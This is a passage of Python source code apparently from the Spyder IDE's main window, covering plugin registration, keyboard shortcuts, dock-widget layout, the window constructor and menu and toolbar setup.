messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.CONF_SECTION] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
else:
self._INTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...".format(plugin.get_name())))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_plugin_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
toolbars = plugin.get_registered_application_toolbars()
for __, toolbar in toolbars.items():
# TODO: To update this render call
toolbar._render()
self.toolbarslist.append(toolbar)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for signal in signals:
try:
signal.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
shortcut = None
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
try:
# New API
if (self.last_plugin is not None
and self.last_plugin.get_widget().is_maximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
except AttributeError:
# Old API
if (self.last_plugin is not None and self.last_plugin._ismaximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugin(self, plugin):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [Console]
tabify = getattr(plugin, 'TABIFY', [self.get_plugin(Plugins.Console)])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf_option('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf_option('enable', True)
plugin.set_conf_option('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
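# Illustrative note for tabify_plugin above: a dockable plugin may declare
# something like TABIFY = [Plugins.Console] (a list of plugin names) to
# choose which existing pane it gets tabbed next to on its first start.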
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
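# Illustrative only, following the error_data keys documented above: a plugin
# would typically emit the signal wired up in register_plugin(), e.g.
#   self.sig_exception_occurred.emit(dict(
#       text=traceback.format_exc(), is_traceback=True,
#       repo='spyder-ide/spyder', title='', label='', steps=''))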
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when pressing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Check for updates Thread and Worker, references needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.preferences.general import MainConfigPage
self.general_prefs = [MainConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
self._report_dlg = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.interpreter_status = None
self.mem_status = None
self.cpu_status = None
self.clock_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Set up a shutdown QTimer if running under CI (TEST_CI_APP)
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window"""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Creating toolbars...")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
self.view_menu.aboutToShow.connect(
lambda: self._update_shortcuts_in_panes_menu(True))
self.view_menu.aboutToHide.connect(
lambda: self._update_shortcuts_in_panes_menu(False))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
# Shortcuts plugin
from spyder.plugins.shortcuts.plugin import Shortcuts
self.shortcuts = Shortcuts(self, configuration=CONF)
self.register_plugin(self.shortcuts)
logger.info("Creating core actions...")
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
(_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars")),
icon=ima.icon('lock' if self.interface_locked else 'lock_open'),
triggered=lambda checked:
self.toggle_lock(not self.interface_locked),
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
self.source_menu.aboutToShow.connect(self.update_source_menu)
logger.info("Creating Tools menu...")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.show_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_shortcut_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
from spyder.plugins.completion.kite.utils.install import (
check_if_kite_installed)
is_kite_installed, kite_path = check_if_kite_installed()
if not is_kite_installed:
install_kite_action = create_action(
self, _("Install Kite completion engine"),
icon=get_icon('kite', adjust_for_interface=True),
triggered=self.show_kite_installation)
self.tools_menu_actions.append(install_kite_action)
self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action]
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
self.tools_menu_actions += [self.menu_lsp_logs]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"), name)
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"), name)
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
logger.info("Creating guidata and sift entries...")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see spyder-ide/spyder#2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except Exception:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except Exception:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
if sys.platform == 'darwin':
self.fullscreen_action.setEnabled(False)
self.fullscreen_action.setToolTip(_("For fullscreen mode use "
"macOS built-in feature"))
else:
self.register_shortcut(
self.fullscreen_action,
"_",
"Fullscreen mode",
add_shortcut_to_tip=True
)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
# Internal console plugin
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
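# The Console plugin instantiated below reads these values from its
# 'internal_console' configuration section.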
from spyder.plugins.console.plugin import Console
self.console = Console(self, configuration=CONF)
self.console.set_exit_function(self.closing)
self.register_plugin(self.console)
# TODO: Load and register the rest of the plugins using new API
# Run plugin
from spyder.plugins.run.plugin import Run
self.run = Run(self, configuration=CONF)
self.register_plugin(self.run)
# Appearance plugin
from spyder.plugins.appearance.plugin import Appearance
self.appearance = Appearance(self, configuration=CONF)
self.register_plugin(self.appearance)
# Main interpreter
from spyder.plugins.maininterpreter.plugin import MainInterpreter
self.maininterpreter = MainInterpreter(self, configuration=CONF)
self.register_plugin(self.maininterpreter)
# Code completion client initialization
self.set_splash(_("Starting code completion manager..."))
from spyder.plugins.completion.manager.plugin import CompletionManager
self.completions = CompletionManager(self)
self.completions.start()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
self.add_plugin(self.outlineexplorer)
from spyder.widgets.status import InterpreterStatus
self.interpreter_status = InterpreterStatus(
self,
status,
icon=ima.icon('environment'),
interpreter=self.maininterpreter.get_interpreter()
)
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
self.add_plugin(self.editor)
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
file_actions = [
self.file_switcher_action,
self.symbol_finder_action,
None,
]
if sys.platform == 'darwin':
file_actions.extend(self.editor.tab_navigation_actions + [None])
file_actions.extend([restart_action, quit_action])
self.file_menu_actions += file_actions
self.set_splash("")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
self.add_plugin(self.variableexplorer)
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
self.add_plugin(self.ipyconsole)
# Help plugin
# TODO: There is a circular dependency between help and ipython since
# ipython console uses css_path.
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
from spyder.plugins.help.plugin import Help
self.help = Help(self, configuration=CONF)
self.register_plugin(self.help)
# History log widget
if CONF.get('historylog', 'enable'):
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self, configuration=CONF)
self.register_plugin(self.historylog)
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self, configuration=CONF)
self.register_plugin(self.plots)
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
self.add_plugin(self.explorer)
# Online help widget
if CONF.get('onlinehelp', 'enable'):
from spyder.plugins.onlinehelp.plugin import OnlineHelp
self.onlinehelp = OnlineHelp(self, configuration=CONF)
self.register_plugin(self.onlinehelp)
# Working directory plugin
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
CONF.set('workingdir', 'init_workdir', self.init_workdir)
self.workingdirectory = WorkingDirectory(self, configuration=CONF)
self.register_plugin(self.workingdirectory)
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
self.add_plugin(self.projects)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self, configuration=CONF)
self.register_plugin(self.findinfiles)
# Load other plugins (former external plugins)
# TODO: Use this loop to load all internal plugins and remove
# duplicated code
# Breakpoints
if CONF.get('breakpoints', 'enable'):
from spyder.plugins.breakpoints.plugin import Breakpoints
self.breakpoints = Breakpoints(self, configuration=CONF)
self.register_plugin(self.breakpoints)
self.thirdparty_plugins.append(self.breakpoints)
# Profiler plugin
if CONF.get('profiler', 'enable'):
from spyder.plugins.profiler.plugin import Profiler
self.profiler = Profiler(self, configuration=CONF)
self.register_plugin(self.profiler)
